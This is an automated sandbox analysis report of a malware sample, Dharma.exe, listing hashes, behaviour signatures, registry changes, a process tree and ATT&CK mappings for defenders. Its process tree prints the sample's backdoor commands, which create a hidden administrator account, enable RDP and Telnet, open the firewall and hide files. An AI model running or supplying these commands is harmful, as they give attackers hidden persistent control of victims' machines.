Analysis
max time kernel: 96s
max time network: 141s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-11-2024 01:32
Static task: static1
Behavioral task: behavioral1
  Sample: Dharma.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: Dharma.exe
  Resource: win10v2004-20241007-en
General
Target: Dharma.exe
Size: 11.5MB
MD5: 928e37519022745490d1af1ce6f336f7
SHA1: b7840242393013f2c4c136ac7407e332be075702
SHA256: 6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
SHA512: 8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
SSDEEP: 196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W
Malware Config
Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Remote Service Session Hijacking: RDP Hijacking (1 TTPs, 2 IoCs)
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

Modifies Windows Firewall (2 TTPs, 1 IoCs)
Processes:
  pid | Process
  628 | netsh.exe

Sets file to hidden (1 TTPs, 1 IoCs)
Modifies file attributes to stop it showing in Explorer etc.

Sets service image path in registry (2 TTPs, 6 IoCs)
Processes:
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\mssqlaq.sys" | mssql.exe
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\mssql.sys" | mssql.exe
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hitqrqgatgqyowu\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\hitqrqgatgqyowu.sys" | mssql.exe
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dxonmrlnggtmlep\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\dxonmrlnggtmlep.sys" | mssql.exe
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\smbkikjttfviant\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\smbkikjttfviant.sys" | mssql.exe
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ehipdtwnkxgjvqao\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\ehipdtwnkxgjvqao.sys" | mssql.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | Dharma.exe
Executes dropped EXE (4 IoCs)
Processes:
  pid | Process
  3708 | nc123.exe
  2344 | mssql.exe
  1396 | mssql2.exe
  4936 | SearchHost.exe

Impair Defenses: Safe Mode Boot (1 TTPs, 8 IoCs)
Processes:
  description | ioc | Process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\EHIPDTWNKXGJVQAO.SYS | mssql.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitqrqgatgqyowu.sys | mssql.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\HITQRQGATGQYOWU.SYS | mssql.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dxonmrlnggtmlep.sys | mssql.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DXONMRLNGGTMLEP.SYS | mssql.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\smbkikjttfviant.sys | mssql.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\SMBKIKJTTFVIANT.SYS | mssql.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ehipdtwnkxgjvqao.sys | mssql.exe

Enumerates connected drives (3 TTPs, 1 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description | ioc | Process
  File opened (read-only) | \??\D: | SearchHost.exe

Password Policy Discovery (1 TTPs)
Attempt to access detailed information about the password policy used within an enterprise network.

Hide Artifacts: Hidden Users (1 TTPs, 1 IoCs)
Processes:
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0" | reg.exe

Launches sc.exe (1 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | Process
  1060 | sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
  Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
  Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Permission Groups Discovery: Local Groups (1 TTPs)
Attempt to find local system groups and permission settings.

System Location Discovery: System Language Discovery (1 TTPs, 29 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | nc123.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mssql2.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WMIC.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Dharma.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | SearchHost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | find.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WMIC.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | find.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | attrib.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | netsh.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
Runs net.exe

Suspicious behavior: LoadsDriver (32 IoCs)
Processes:
  pid | Process
  2344 | mssql.exe (32 identical rows)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  description | pid | Process
  Token: SeDebugPrivilege | 2344 | mssql.exe
  Token: SeLoadDriverPrivilege | 2344 | mssql.exe (32 identical rows)
  Token: SeDebugPrivilege | 1396 | mssql2.exe
  Token: SeIncreaseQuotaPrivilege | 3060 | WMIC.exe
  Token: SeSecurityPrivilege | 3060 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 3060 | WMIC.exe
  Token: SeLoadDriverPrivilege | 3060 | WMIC.exe
  Token: SeSystemProfilePrivilege | 3060 | WMIC.exe
  Token: SeSystemtimePrivilege | 3060 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 3060 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 3060 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 3060 | WMIC.exe
  Token: SeBackupPrivilege | 3060 | WMIC.exe
  Token: SeRestorePrivilege | 3060 | WMIC.exe
  Token: SeShutdownPrivilege | 3060 | WMIC.exe
  Token: SeDebugPrivilege | 3060 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 3060 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 3060 | WMIC.exe
  Token: SeUndockPrivilege | 3060 | WMIC.exe
  Token: SeManageVolumePrivilege | 3060 | WMIC.exe
  Token: 33 | 3060 | WMIC.exe
  Token: 34 | 3060 | WMIC.exe
  Token: 35 | 3060 | WMIC.exe
  Token: 36 | 3060 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 3060 | WMIC.exe
  Token: SeSecurityPrivilege | 3060 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 3060 | WMIC.exe
  Token: SeLoadDriverPrivilege | 3060 | WMIC.exe
  Token: SeSystemProfilePrivilege | 3060 | WMIC.exe
  Token: SeSystemtimePrivilege | 3060 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 3060 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 3060 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 3060 | WMIC.exe

Suspicious use of FindShellTrayWindow (1 IoCs)
Processes:
  pid | Process
  4936 | SearchHost.exe

Suspicious use of SendNotifyMessage (1 IoCs)
Processes:
  pid | Process
  4936 | SearchHost.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
Processes:
  pid | Process
  2344 | mssql.exe
  2344 | mssql.exe
  1396 | mssql2.exe
  1396 | mssql2.exe
  4936 | SearchHost.exe
  2344 | mssql.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description | pid | Process | procid_target; identical rows collapsed with their count):
  PID 3012 wrote to memory of 3708 | 3012 | Dharma.exe | 82 (3 rows)
  PID 3012 wrote to memory of 2344 | 3012 | Dharma.exe | 85 (2 rows)
  PID 3012 wrote to memory of 1396 | 3012 | Dharma.exe | 86 (3 rows)
  PID 3012 wrote to memory of 4208 | 3012 | Dharma.exe | 87 (3 rows)
  PID 3012 wrote to memory of 4248 | 3012 | Dharma.exe | 89 (3 rows)
  PID 3012 wrote to memory of 4936 | 3012 | Dharma.exe | 91 (3 rows)
  PID 4248 wrote to memory of 4492 | 4248 | cmd.exe | 93 (3 rows)
  PID 4492 wrote to memory of 3060 | 4492 | cmd.exe | 94 (3 rows)
  PID 4492 wrote to memory of 4640 | 4492 | cmd.exe | 95 (3 rows)
  PID 4248 wrote to memory of 2784 | 4248 | cmd.exe | 97 (3 rows)
  PID 2784 wrote to memory of 3688 | 2784 | net.exe | 98 (3 rows)
  PID 4248 wrote to memory of 1332 | 4248 | cmd.exe | 101 (3 rows)
  PID 1332 wrote to memory of 4384 | 1332 | net.exe | 102 (3 rows)
  PID 4248 wrote to memory of 1852 | 4248 | cmd.exe | 103 (3 rows)
  PID 1852 wrote to memory of 3584 | 1852 | cmd.exe | 104 (3 rows)
  PID 1852 wrote to memory of 3560 | 1852 | cmd.exe | 105 (3 rows)
  PID 4248 wrote to memory of 2212 | 4248 | cmd.exe | 106 (3 rows)
  PID 2212 wrote to memory of 2680 | 2212 | net.exe | 107 (3 rows)
  PID 3708 wrote to memory of 4992 | 3708 | nc123.exe | 108 (3 rows)
  PID 4248 wrote to memory of 4084 | 4248 | cmd.exe | 109 (3 rows)
  PID 4084 wrote to memory of 4552 | 4084 | net.exe | 110 (3 rows)
  PID 4248 wrote to memory of 3636 | 4248 | cmd.exe | 111 (2 rows)

Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes (process tree; [n] is the depth in the tree)

[1] C:\Users\Admin\AppData\Local\Temp\Dharma.exe (PID 3012)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Dharma.exe"
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    [2] C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe (PID 3708)
        Command line: "C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\cmd.exe (PID 4992)
            Command line: C:\Windows\system32\cmd.exe /c cls
            - System Location Discovery: System Language Discovery

    [2] C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe (PID 2344)
        Command line: "C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe"
        - Sets service image path in registry
        - Executes dropped EXE
        - Impair Defenses: Safe Mode Boot
        - Suspicious behavior: LoadsDriver
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx

    [2] C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe (PID 1396)
        Command line: "C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx

    [2] C:\Windows\SysWOW64\cmd.exe (PID 4208)
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ac\Shadow.bat" "
        - System Location Discovery: System Language Discovery

    [2] C:\Windows\SysWOW64\cmd.exe (PID 4248)
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ac\systembackup.bat" "
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\cmd.exe (PID 4492)
            Command line: C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 3060)
                Command line: WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                - System Location Discovery: System Language Discovery
                - Suspicious use of AdjustPrivilegeToken

            [4] C:\Windows\SysWOW64\find.exe (PID 4640)
                Command line: Find "="
                - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\net.exe (PID 2784)
            Command line: net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\net1.exe (PID 3688)
                Command line: C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\net.exe (PID 1332)
            Command line: net localgroup Administrators systembackup /add
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\net1.exe (PID 4384)
                Command line: C:\Windows\system32\net1 localgroup Administrators systembackup /add
                - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\cmd.exe (PID 1852)
            Command line: C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 3584)
                Command line: WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                - System Location Discovery: System Language Discovery

            [4] C:\Windows\SysWOW64\find.exe (PID 3560)
                Command line: Find "="
                - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\net.exe (PID 2212)
            Command line: net localgroup "Remote Desktop Users" systembackup /add
            - Remote Service Session Hijacking: RDP Hijacking
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\net1.exe (PID 2680)
                Command line: C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
                - Remote Service Session Hijacking: RDP Hijacking
                - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\net.exe (PID 4084)
            Command line: net accounts /forcelogoff:no /maxpwage:unlimited
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\net1.exe (PID 4552)
                Command line: C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\reg.exe (PID 3636)
            Command line: reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
            - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\reg.exe (PID 2832)
            Command line: reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
            - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\reg.exe (PID 2616)
            Command line: reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
            - Hide Artifacts: Hidden Users
            - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\attrib.exe (PID 2672)
            Command line: attrib C:\users\systembackup +r +a +s +h
            - Sets file to hidden
            - System Location Discovery: System Language Discovery
            - Views/modifies file attributes

        [3] C:\Windows\SysWOW64\netsh.exe (PID 628)
            Command line: netsh firewall add portopening TCP 3389 "Remote Desktop"
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\sc.exe (PID 1060)
            Command line: sc config tlntsvr start=auto
            - Launches sc.exe
            - System Location Discovery: System Language Discovery

        [3] C:\Windows\SysWOW64\net.exe (PID 3392)
            Command line: net start Telnet
            - System Location Discovery: System Language Discovery

            [4] C:\Windows\SysWOW64\net1.exe (PID 4316)
                Command line: C:\Windows\system32\net1 start Telnet
                - System Location Discovery: System Language Discovery

    [2] C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe (PID 4936)
        Command line: "C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe"
        - Executes dropped EXE
        - Enumerates connected drives
        - System Location Discovery: System Language Discovery
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
  Account Manipulation (1)
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1): Windows Service (1)
  Event Triggered Execution (1): Netsh Helper DLL (1)
Privilege Escalation
  Account Manipulation (1)
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1): Windows Service (1)
  Event Triggered Execution (1): Netsh Helper DLL (1)
Defense Evasion
  Hide Artifacts (3): Hidden Files and Directories (2), Hidden Users (1)
  Impair Defenses (2): Disable or Modify System Firewall (1), Safe Mode Boot (1)
  Modify Registry (1)
Downloads